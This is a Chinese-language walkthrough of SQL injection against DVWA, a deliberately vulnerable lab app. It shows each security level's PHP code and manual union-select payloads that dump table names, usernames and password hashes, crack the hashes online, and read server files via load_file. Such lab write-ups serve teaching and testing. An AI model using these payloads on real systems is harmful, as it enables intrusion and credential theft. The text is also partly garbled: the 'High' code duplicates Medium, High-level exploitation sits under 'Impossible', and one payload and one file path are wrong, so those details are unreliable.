一步一步学习DVWA--SQL Injection SQL注入（第六期）

SQL Injection，即SQL注入，是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件，据说黑客依靠的就是常见的SQL注入漏洞。

手工注入思路

自动化的注入神器sqlmap固然好用，但还是要掌握一些手工注入的思路，下面简要介绍手工注入（非盲注）的步骤。

1.判断是否存在注入，注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据。

下面对四种级别的代码进行分析。

1、Low级别

服务器端核心代码

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    mysqli_close($GLOBALS["___mysqli_ston"]); 
} 

?> 

可以看到，Low级别的代码对来自客户端的参数id（ $id = $_REQUEST[ 'id' ];）没有进行任何的检查与过滤，存在明显的SQL注入。

漏洞利用

现实攻击场景下，攻击者是无法看到后端代码的，所以下面的手工注入步骤是建立在无法看到源码的基础上。

1.判断是否存在注入，注入是字符型还是数字型

输入1，查询成功：

输入2，得到

输入 1' or '1=2  得到下面的输出

返回了多个结果，说明存在字符型注入。

猜测SQL查询语句中的字段数

输入 1' or 1=1 order by 1 #，查询

把数据库中的数据都查询出来了。

输入1' or 1=1 order by 2 #，一样能够查询出结果。

核对两次结果，是否按照字段1或2排序了。

输入  1' or 1=1 order by 3 #查询时，报下面错误，说明没有3个字段，只有First name和Surname两个字段。

输入1' union select 1,2 #，确认字段顺序，从下图可以看出，First name是第一个字段，Suname是第二个字段。说明代码中SQL语句为select First name,Surname from 表 where ID=’id’……

获取当前数据库

输入1' union select 1,database() #

这说明数据库名称为dvwa

查看数据库版本：1'  union select 1,version() #

查看当前数据库用户：1'  union select 1,user() #

查看当前用户是否为root：1' ord(mid(user(),1,1))=114

返回正常，则说明为root。

猜测库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

出现如下图截图，则执行成功，得到库中存在两个表，guestbook,users

 

如果报下面错误

Illegal mix of collations for operation 'UNION'

解决方案是，把对应的表和数据库属性设置为utf_general_ci

获取表中的字段

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

执行结果：

 

说明users表中有8个字段，分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

下载数据

1' or 1=1 union select group_concat(user_id,first_name,last_name), group_concat(password) from users #

把查询出的MD5密码，通过MD5解密，解析出密码，例如5f4dcc3b5aa765d61d8327deb882cf99  在线解密得到password

https://www.cmd5.com/

2、Medium级别

查看源代码

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

可以看到，Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,',",\x1a进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。

漏洞利用

虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数，提交恶意构造的查询参数。

1.判断是否存在注入，注入是字符型还是数字型

抓包更改参数id为1' or 1=1 #

使用Fiddler抓到报文如下

POST http://192.168.92.129/DVWA/vulnerabilities/sqli/ HTTP/1.1

Host: 192.168.92.129

Connection: keep-alive

Content-Length: 18

Cache-Control: max-age=0

Origin: http://192.168.92.129

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://192.168.92.129/DVWA/vulnerabilities/sqli/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: security=medium; PHPSESSID=b0tk9dlreg5shs8jjourolhv5a

 

id=1&Submit=Submit

 

修改id为 id=1’ or 1=1 @Submit=Submit

提交报文，报错如下

 

抓包更改参数id为1 or 1=1 #，查询成功：

修改id为 id=1 or 1=1 @Submit=Submit再次提交，出现下面返回报文，则证明提交成功。

说明存在数字型注入。

（由于是数字型注入，服务器端的mysql_real_escape_string函数就形同虚设了，因为数字型注入并不需要借助引号。）

猜解SQL查询语句中的字段数

抓包更改参数id为1 order by 2 #，查询成功：

抓包更改参数id为1 order by 3 #，报错：

说明执行的SQL查询语句中只有两个字段，即这里的First name、Surname。

确定显示的字段顺序

抓包更改参数id为1 union select 1,2 #，查询成功：

说明执行的SQL语句为select First name,Surname from 表 where ID=id...

获取当前数据库

抓包更改参数id为1 union select 1,database() #，查询成功：

说明当前的数据库为dvwa。

获取数据库中的表抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查询成功：

说明数据库dvwa中一共有两个表，guestbook与users。

获取表中的字段名抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#，查询失败：

这是因为单引号被转义了，变成了\’。可以利用16进制进行绕过，抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #，查询成功：

说明users表中有8个字段，分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

下载数据

抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功：

 

3、High级别

服务器端核心代码

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

可以看到，与Medium级别的代码相比，High级别的只是在SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果。

输入：

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #输入界面如下：

说明也可以获取数据库中的表。为什么输出了两行

输入：

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#获得下面信息

这限制了只输出第一行，无法进行攻击。

 

4、Impossible级别

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 
        $row = $data->fetch(); 

        // Make sure only 1 result is returned 
        if( $data->rowCount() == 1 ) { 
            // Get values 
            $first = $row[ 'first_name' ]; 
            $last  = $row[ 'last_name' ]; 

            // Feedback for end user 
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

可以看到，不可能的等级的代码采用了PDO技术，划清了代码与数据的界限，有效的SQL注入，同时也限定了输入必须为数字，且只有返回的查询结果数量为一时，才会成功输出，这样就有效地预防了“脱裤” ”，Anti-CSRFtoken机制的加入了进一步提高了安全性。

漏洞利用

虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样，直接最后一步演示下载数据。

输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功：

需要特别提到的是，High级别的查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转，这样做的目的是为了防止一般的sqlmap注入，因为sqlmap在注入过程中，无法在查询提交页面上获取查询的结果，没有了反馈，也就没办法进一步注入。

查询操作系统信息

1' and 1=2 union all select @@global.version_compile_os from mysql.user #

and 1=2 union select 1,load_file(0x433a5c78616d70705c6874646f63735c696e6465782e68746d6c) --- C:\boot.in #

 

关注安全   关注作者

--------------------------------------------------------------------------------------------------------------------------------------------------------------

(完)